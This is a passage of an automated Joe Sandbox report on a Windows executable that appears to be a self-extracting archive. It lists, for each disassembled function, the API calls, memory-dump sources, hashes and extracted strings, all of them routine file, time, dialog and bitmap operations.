                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                            • API String ID: 667068680-1718035505
                                                            • Opcode ID: 2c9aaf73fae10758a1d61c579c817263e1c41c8acefa12d7d0623459ab1cac41
                                                            • Instruction ID: c247fd15a7d9a1a8b4f4c2d98872d27c1587e3f51a007cf4fc57d36e2dc72c16
                                                            • Opcode Fuzzy Hash: 2c9aaf73fae10758a1d61c579c817263e1c41c8acefa12d7d0623459ab1cac41
                                                            • Instruction Fuzzy Hash: B1F0AF327816625BCF214E647C9BA6E2EC87F377923280C79D901D31C0FB268C5A6A94
                                                            APIs
                                                            • _free.LIBCMT ref: 0051891E
                                                              • Part of subcall function 00518DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0051C896,?,00000000,?,00000000,?,0051C8BD,?,00000007,?,?,0051CCBA,?), ref: 00518DE2
                                                              • Part of subcall function 00518DCC: GetLastError.KERNEL32(?,?,0051C896,?,00000000,?,00000000,?,0051C8BD,?,00000007,?,?,0051CCBA,?,?), ref: 00518DF4
                                                            • _free.LIBCMT ref: 00518930
                                                            • _free.LIBCMT ref: 00518943
                                                            • _free.LIBCMT ref: 00518954
                                                            • _free.LIBCMT ref: 00518965
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID: pR
                                                            • API String ID: 776569668-2883592124
                                                            • Opcode ID: cfa6a74f49f0491231ac121bb51585f539c9880aad39986d5e4179ca6e776402
                                                            • Instruction ID: ac0be85d48b61785ffa37c8b10d6f8a00b80a4123d2f011639e57a3a306b49aa
                                                            • Opcode Fuzzy Hash: cfa6a74f49f0491231ac121bb51585f539c9880aad39986d5e4179ca6e776402
                                                            • Instruction Fuzzy Hash: F5F082798103338BDA266F14FC564A53FB5FB37722B41090AF014562B1CF35498AFB81
                                                            APIs
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 005014C2
                                                              • Part of subcall function 004FB146: GetVersionExW.KERNEL32(?), ref: 004FB16B
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 005014E6
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00501500
                                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00501513
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00501523
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00501533
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
                                                            • Opcode ID: ce5457fc08c1857881c5c86bc2efe9d5adb0b5676590c9d17d3dd320972f91e4
                                                            • Instruction ID: 775a0fb606226da6c93801c75d76cbb3da301ff77e3a8c8580f25a9d6068398d
                                                            • Opcode Fuzzy Hash: ce5457fc08c1857881c5c86bc2efe9d5adb0b5676590c9d17d3dd320972f91e4
                                                            • Instruction Fuzzy Hash: DC31F875108305ABC700DFA8C88499BBBF8FF98714F004A1EF995C3250E734D619CBA6
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00512AF1,005102FC,0050FA34), ref: 00512B08
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00512B16
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00512B2F
                                                            • SetLastError.KERNEL32(00000000,00512AF1,005102FC,0050FA34), ref: 00512B81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            • Opcode ID: 2888e7f7cc4ac50b6090551960dfca2b452822de5eadf379e22d3932c2af01ac
                                                            • Instruction ID: 78fcdc0e709999ad5f6aa0124f6f3500467a608afb5b6dbba14ed42833e9a332
                                                            • Opcode Fuzzy Hash: 2888e7f7cc4ac50b6090551960dfca2b452822de5eadf379e22d3932c2af01ac
                                                            • Instruction Fuzzy Hash: 7301DF3220C3126EF7342A747C9A9EA2F59FFA27B4F600B3AF110550E0EF114C96A244
                                                            APIs
                                                            • GetLastError.KERNEL32(?,00531030,00514674,00531030,?,?,00513F73,00000050,?,00531030,00000200), ref: 005197E9
                                                            • _free.LIBCMT ref: 0051981C
                                                            • _free.LIBCMT ref: 00519844
                                                            • SetLastError.KERNEL32(00000000,?,00531030,00000200), ref: 00519851
                                                            • SetLastError.KERNEL32(00000000,?,00531030,00000200), ref: 0051985D
                                                            • _abort.LIBCMT ref: 00519863
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free$_abort
                                                            • String ID:
                                                            • API String ID: 3160817290-0
                                                            • Opcode ID: 67d040411a1b030707eddb0518c83e9d17d835c032ac3f54a795e949a3ac00f2
                                                            • Instruction ID: 2ae68881ead2e3a442a93a941567e270c6434fcdf480daf3803569fb16f90c3d
                                                            • Opcode Fuzzy Hash: 67d040411a1b030707eddb0518c83e9d17d835c032ac3f54a795e949a3ac00f2
                                                            • Instruction Fuzzy Hash: 74F0A43554070276F72233247C6EEEB1E69BFE3B71F250628F51492192FF24C88B9565
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0050DC47
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0050DC61
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0050DC72
                                                            • TranslateMessage.USER32(?), ref: 0050DC7C
                                                            • DispatchMessageW.USER32(?), ref: 0050DC86
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0050DC91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 2148572870-0
                                                            • Opcode ID: da266163829122e8f114b0f718d762b0dfe46150dbf942e296fcea4f464c1bc0
                                                            • Instruction ID: 0d3cf4fbce7f62439dd99ced7bd296d058bb39799dd130fb3c87f237d7a36ce3
                                                            • Opcode Fuzzy Hash: da266163829122e8f114b0f718d762b0dfe46150dbf942e296fcea4f464c1bc0
                                                            • Instruction Fuzzy Hash: F5F03C72A01319BBCB206BA5DC4CDCF7F7DFF52792B004421B50AD20A0D674864ADBB0
                                                            APIs
                                                              • Part of subcall function 0050A699: GetDC.USER32(00000000), ref: 0050A69D
                                                              • Part of subcall function 0050A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0050A6A8
                                                              • Part of subcall function 0050A699: ReleaseDC.USER32(00000000,00000000), ref: 0050A6B3
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 0050A83C
                                                              • Part of subcall function 0050AAC9: GetDC.USER32(00000000), ref: 0050AAD2
                                                              • Part of subcall function 0050AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0050AB01
                                                              • Part of subcall function 0050AAC9: ReleaseDC.USER32(00000000,?), ref: 0050AB99
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ObjectRelease$CapsDevice
                                                            • String ID: "P$($AP
                                                            • API String ID: 1061551593-564177875
                                                            • Opcode ID: 23408bbf00706b32859cb9a3e04f1ccfe24a511d03361b877b17a7b815353c5d
                                                            • Instruction ID: 6242354a3a927050da3f8d2d5f9c96fd1374d40d3b8480faded2818ee522179a
                                                            • Opcode Fuzzy Hash: 23408bbf00706b32859cb9a3e04f1ccfe24a511d03361b877b17a7b815353c5d
                                                            • Instruction Fuzzy Hash: 9A91E275604355AFD720DF25C848A2BBBE8FFD9700F00491EF59AD72A0DB30A946DB62
                                                            APIs
                                                              • Part of subcall function 005005DA: _wcslen.LIBCMT ref: 005005E0
                                                              • Part of subcall function 004FB92D: _wcsrchr.LIBVCRUNTIME ref: 004FB944
                                                            • _wcslen.LIBCMT ref: 004FC197
                                                            • _wcslen.LIBCMT ref: 004FC1DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_wcsrchr
                                                            • String ID: .exe$.rar$.sfx
                                                            • API String ID: 3513545583-31770016
                                                            • Opcode ID: 20b4a768f79fd353fb2bd69fce55be855b3e9b630efd4aad272151c20782ff52
                                                            • Instruction ID: 09d1e58e89f1e15122733c5d397c441e1b88c36210e4bd0a3ce4b91521089dc1
                                                            • Opcode Fuzzy Hash: 20b4a768f79fd353fb2bd69fce55be855b3e9b630efd4aad272151c20782ff52
                                                            • Instruction Fuzzy Hash: E641562150032E99C735AF708A96A7F77A8FF42704F10494FFA816B2C1EB584D92C39A
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 004FBB27
                                                            • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,004FA275,?,?,00000800,?,004FA23A,?,004F755C), ref: 004FBBC5
                                                            • _wcslen.LIBCMT ref: 004FBC3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CurrentDirectory
                                                            • String ID: UNC$\\?\
                                                            • API String ID: 3341907918-253988292
                                                            • Opcode ID: c8ac512592311b07aca06a20e5598c951f654dff18ea35152d830e371e4ec1f5
                                                            • Instruction ID: de88bf5762d98e82eb7d5e39e27a8b47cb126466f08cec19e97feb5eb7f54110
                                                            • Opcode Fuzzy Hash: c8ac512592311b07aca06a20e5598c951f654dff18ea35152d830e371e4ec1f5
                                                            • Instruction Fuzzy Hash: 3241A33150025EA6DB21AF20CC05EFF7B69FF43394F10446BFA54A3291DB78DA918AE4
                                                            APIs
                                                            • _wcschr.LIBVCRUNTIME ref: 0050CD84
                                                              • Part of subcall function 0050AF98: _wcschr.LIBVCRUNTIME ref: 0050B033
                                                              • Part of subcall function 00501FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,004FC116,00000000,.exe,?,?,00000800,?,?,?,00508E3C), ref: 00501FD1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _wcschr$CompareString
                                                            • String ID: <$HIDE$MAX$MIN
                                                            • API String ID: 69343711-3358265660
                                                            • Opcode ID: d458fa6d53f6307a6a1daf9a4cf6f28d81aab73aa46ebac1e5e6b12c8cc8b18c
                                                            • Instruction ID: 1fb8535b80930d8498daca0d4365b675321a0268e603f3454895b31e3b6e6afb
                                                            • Opcode Fuzzy Hash: d458fa6d53f6307a6a1daf9a4cf6f28d81aab73aa46ebac1e5e6b12c8cc8b18c
                                                            • Instruction Fuzzy Hash: 2431727290061A9ADF25CB50DC45AEE7FBCFB55350F004666E905E71C0EBB09A848FA1
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 0050AAD2
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 0050AB01
                                                            • ReleaseDC.USER32(00000000,?), ref: 0050AB99
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ObjectRelease
                                                            • String ID: -P$7P
                                                            • API String ID: 1429681911-3971959481
                                                            • Opcode ID: ed69dac6dc0a45a3afcae435dbe4361b1c6cf8219ff37d746c7a245f6b207d30
                                                            • Instruction ID: 2343409247252c83f4f4cb02b674fd91bed1b4aa558a6211b0023aed563473f2
                                                            • Opcode Fuzzy Hash: ed69dac6dc0a45a3afcae435dbe4361b1c6cf8219ff37d746c7a245f6b207d30
                                                            • Instruction Fuzzy Hash: 1A21FF72108304EFD3019F95DC4CD6FBFE9FB99392F040429FA4992170D7319A589B62
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 004FB9B8
                                                              • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                                            • _wcschr.LIBVCRUNTIME ref: 004FB9D6
                                                            • _wcschr.LIBVCRUNTIME ref: 004FB9E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                            • String ID: %c:\
                                                            • API String ID: 525462905-3142399695
                                                            • Opcode ID: 955edac7ed3227b5d574c5c5858a203e088bacd34cb924e64d846ea1aff73fc7
                                                            • Instruction ID: a8d2d9e3e078e1850b7f8733492c01bbd0c8e84f435f55bf224ecb0dacd7f26a
                                                            • Opcode Fuzzy Hash: 955edac7ed3227b5d574c5c5858a203e088bacd34cb924e64d846ea1aff73fc7
                                                            • Instruction Fuzzy Hash: EA01F5A350031669AA306B75DC46D7BABACEFD7770B40490FF754D6282EB38D89082F5
                                                            APIs
                                                              • Part of subcall function 004F1316: GetDlgItem.USER32(00000000,00003021), ref: 004F135A
                                                              • Part of subcall function 004F1316: SetWindowTextW.USER32(00000000,005235F4), ref: 004F1370
                                                            • EndDialog.USER32(?,00000001), ref: 0050B2BE
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0050B2D6
                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 0050B304
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: GETPASSWORD1$xzT
                                                            • API String ID: 445417207-2147243542
                                                            • Opcode ID: cbd0ee8c55ea77664e9ce1dabeaf7280b11c24a95fba59693e11dbe86a954a24
                                                            • Instruction ID: 8f5484d2d04f617062e76263396c74675ea5678ae6f291151ad95398b12620b0
                                                            • Opcode Fuzzy Hash: cbd0ee8c55ea77664e9ce1dabeaf7280b11c24a95fba59693e11dbe86a954a24
                                                            • Instruction Fuzzy Hash: AF11E132900219B6EB219A649C99FFF3B6CFF19744F100421FA45B20D0C7A49A049761
                                                            APIs
                                                            • LoadBitmapW.USER32(00000065), ref: 0050B6ED
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0050B712
                                                            • DeleteObject.GDI32(00000000), ref: 0050B744
                                                            • DeleteObject.GDI32(00000000), ref: 0050B767
                                                              • Part of subcall function 0050A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0050B73D,00000066), ref: 0050A6D5
                                                              • Part of subcall function 0050A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0050B73D,00000066), ref: 0050A6EC
                                                              • Part of subcall function 0050A6C2: LoadResource.KERNEL32(00000000,?,?,?,0050B73D,00000066), ref: 0050A703
                                                              • Part of subcall function 0050A6C2: LockResource.KERNEL32(00000000,?,?,?,0050B73D,00000066), ref: 0050A712
                                                              • Part of subcall function 0050A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0050B73D,00000066), ref: 0050A72D
                                                              • Part of subcall function 0050A6C2: GlobalLock.KERNEL32(00000000), ref: 0050A73E
                                                              • Part of subcall function 0050A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0050A762
                                                              • Part of subcall function 0050A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0050A7A7
                                                              • Part of subcall function 0050A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0050A7C6
                                                              • Part of subcall function 0050A6C2: GlobalFree.KERNEL32(00000000), ref: 0050A7CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                            • String ID: ]
                                                            • API String ID: 1797374341-3352871620
                                                            • Opcode ID: e66af11d95bda689f78fc09a61637903976c6ced6179290e617461c1e4def90f
                                                            • Instruction ID: 8d62dd9e2db7cb88ea0fb753fd40b2d583297a8d754e7c4723ec2a87164eeb95
                                                            • Opcode Fuzzy Hash: e66af11d95bda689f78fc09a61637903976c6ced6179290e617461c1e4def90f
                                                            • Instruction Fuzzy Hash: F501C436940306A7EB1277745C5DABF7EB9FFC0792F080010F900A72E1DF218D095662
                                                            APIs
                                                              • Part of subcall function 004F1316: GetDlgItem.USER32(00000000,00003021), ref: 004F135A
                                                              • Part of subcall function 004F1316: SetWindowTextW.USER32(00000000,005235F4), ref: 004F1370
                                                            • EndDialog.USER32(?,00000001), ref: 0050D64B
                                                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0050D661
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 0050D675
                                                            • SetDlgItemTextW.USER32(?,00000068), ref: 0050D684
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: RENAMEDLG
                                                            • API String ID: 445417207-3299779563
